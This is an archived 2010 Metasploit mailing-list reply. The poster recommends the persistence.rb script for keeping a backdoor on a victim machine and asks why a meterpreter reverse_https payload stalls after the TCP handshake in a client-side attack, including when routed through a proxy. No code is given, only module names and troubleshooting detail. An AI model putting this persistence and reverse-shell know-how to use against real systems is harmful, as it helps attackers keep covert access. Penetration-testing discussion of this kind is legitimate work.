Metasploit mailing list archives

Re: Persistent Backdoor

From: Tom Van de Wiele <tom.vandewiele () gmail com>
Date: Sat, 9 Oct 2010 23:09:10 +0200

Hi,

Sort of dropping into this thread, my apologies. Persistence.rb is really
recommended instead of setting regkeys individually. Unless the victim has
checks for the regkeys set by persistence.rb ofcourse. I have a little issue
with it, in that it runs great with e.g. a
windows/meterpreter/reverse_tcp payload
but has anyone experienced problems with running it with a
windows/meterpreter/reverse_https payload? I'm doing a file format client
directed attack with another box as an exploit/multi/handler and on that box
I see the reverse connection coming in from the victim to my multi/handler.
I see a tcp handshake being performed but then no data being sent by the
victim. After which the connection times out. I'm using reverse_https with
443/tcp as the client connecting back has to traverse a proxy server. I have
tried this in another testlab with no proxy server in between (2 machines
sitting in the same lan) but I get the same behavior. Using ruby1.9.1 and
build svn r10585 from 2 days ago.

Thank you for sharing your experiences or any pointers on how I can diagnose
this further.